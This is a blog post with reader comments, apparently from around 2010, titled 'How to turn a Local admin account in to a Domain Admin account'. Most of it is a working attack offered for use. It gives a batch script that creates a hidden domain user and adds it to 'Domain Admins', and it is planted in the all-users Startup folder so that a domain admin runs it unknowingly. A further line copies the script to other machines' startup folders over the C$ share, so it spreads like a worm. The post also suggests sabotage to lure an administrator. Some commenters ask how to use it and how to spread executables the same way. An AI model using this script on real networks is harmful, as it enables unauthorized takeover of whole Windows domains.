How to turn a Local admin account in to a Domain Admin account

I could have easily called this article “How to hack and take control of an entire Windows Network” but that would draw a lot of negative attention, and it probably should. Let’s start off with a little background on the terminology for those who don’t know that much about Window’s methods of networking. (You can skip to the next section otherwise) A “Domain Admins” is is the security group for users who have administrator rights on every machine that is a member of the domain. A domain is like a workgroup of computers that are under control of the local Active Directory Server. If you’re not in the domain you don’t have access to much. We’re going to change that, by gaining this level of access. There are two basic types of users. Administrators, and Users. Users aren’t allowed to do very much, can’t install software, change things, etc. Whereas Administrators have total control. Local administrators have control of that one computer only. Domain Administrators have control over all pc’s that are part of the domain. In particular they have access to the root share, C$ the default share on every windows professional based pc. If you can become Domain admin, you can access every file on every computer through this share!  Now many legacy applications will fail to run as a simple user, so it’s common practice to make a “User” a “Local Admin” of a computer. That means that user has access to add printers, add/remove software of their own pc. This was the pc is still managed, but the user has more freedom to blow up their computer doing awesome stunts like deleting c:/windows/system32 to save space. “But I don’t use that so I thought it was ok to delete…”  If you can grasp all that, I’ll go ahead into the description of the “How” you elevate from “Local Admin” to “Domain Admin”

How to a turn my local admin into a Domain admin?

Ok, this is where I’m going to scare you a bit. It’s easy, you don’t need any tools, or the advanced knowledge of expert know how. You only need to type these two lines into a batch file!

net user /domain /add dirtyhackor mysecretpass
net group /domain "Domain Admins" /add dirtyhackor

Have No Fear

The first line creates a new user on the domain name dirtyhackor and the second line add that user to the Domain Admins Group. The masters of Windows domains maybe laughing right now, because they know this script won’t fly as it. Because the users don’t have access to create users, and they will only get an error, and Mr. Admin you are to sly to run a batch script without reading it first right? Well how about these apples, place the script in the all users folder under Programs in the “Startup Folder” on this computer. Now when the domain admin walks by to fix your computer, when they log in they will unknowingly run this script and voila! Now you have a secretly created user called “dirtyhackor” on the domain with full access to everything!

But how to get a domain admin to access your computer? A little sabotage can usually get a member of the domain to sign into your(target) computer. Many users are also members of multiple computers as well. What if you wanted to get you’re newly found batch script on to all of the computer’s you are a local admin? Just one more line of batch will let us easily spread the script to other computers over the network!

net user /domain /add dirtyhackor mysecretpass
net group /domain "Domain Admins" /add dirtyhackor
for /F %%i in ('net view') do copy /Y %0 "%%ic$documents and settingsall usersstart menuprogramsstartup"

As you can see, the two lines above are the same as in the previous example, but the third line will scan for all pc’s on the local network, and for the ones that you have local admin rights to, will copy this script to each computer you have access to! So let’s say three people work at the one workstation. Sam logs in, and this spreads to all computers he has access to. Then Sally logs in and it spreads to all of her workstations, Followed by Steve. If they all have access to 3 computers each, that’s 7 computers with the script on it now. Then if anyone uses their computers…. the pattern of spreading continues throughout the network! Eventually a domain admin will run the script and you’re in!

[section label=”Ramifications” anchor=”Ramifications”]Ramifications

What can you do with this power? Install software on any pc, remotely, keyloggers,send spam, webservers, game servers, backup storage, anything you would want to. SO if you’re a network admin (Like me) You’re probably really thinking about all the times you’ve logged in to a workstation! So what can you do against this threat? Well being aware of this type of trickery is a start, and secondly, make sure you assign domain admin to as few people as possible.

Spread the word! E-mail this to someone who you know needs to be aware of this, and please stumble or dig this, as that will really help get the word out! Thanks for reading!!! +Green

  1. harryoui November 19, 2015 at 11:10 am

    Hey Jason,

    Wouldn’t this idea make a prompt for UAC everytime the computer starts up? Making it likely for a Administrator to simply press ‘No’, and also to perhaps check the file directory and remove the file?

    • harryoui November 19, 2015 at 11:17 am

      Not to mention you would have to make the script run as admin as to not get a Access Denied reply

  2. callum August 30, 2011 at 6:30 pm

    so if i copy the first two lines into a batch and put it in the all users > start up folder it will run when the domain admin logs in?

    net user /domain /add dirtyhackor mysecretpassnet group /domain “Domain Admins” /add dirtyhackor

    do i have to replace /domain with my actual domain?

    • +Jason September 12, 2011 at 8:06 am

      No, in this case /domain and /add tells the program “net user” to add dirtyhacker to the domain (That you are authenticated on)

  3. Tyler August 23, 2011 at 7:32 am

    I have a question, is there a way to use a bat to do this same thing but spread a exe to all the other startup folders on a domain?

  4. Jason February 15, 2011 at 9:12 am

    Why would access to the startup folder be denied to an admin account?

  5. mojodo October 10, 2010 at 6:10 pm

    Unless I am a responsible admin and lock down the ability to add users to the domain admin group through policy.

    • Jason February 15, 2011 at 9:11 am

      mojodo, I looked into this, and how can you do that from Group Policy?
      I don't even see an obvious way to make that happen.

    • Jason October 10, 2010 at 6:53 pm

      True, that's one way to do it. Now how many actually do I wonder? I know of at least 12 small to medium businesses who have the guy who is "Good at computers" the admin of their network.

      One of them has over 100 workstations. If you're a "roaming" tech like I was, you'd know how many are out there. I also have it on good authority that a specific large credit company is also set up this way.

      But in short Mojodo is absolutely right, but how many do it that is what I ask?

      • Tom February 14, 2011 at 12:29 pm

        Another problem is if access to the startup folder is denied.

Leave a reply

Skip to toolbar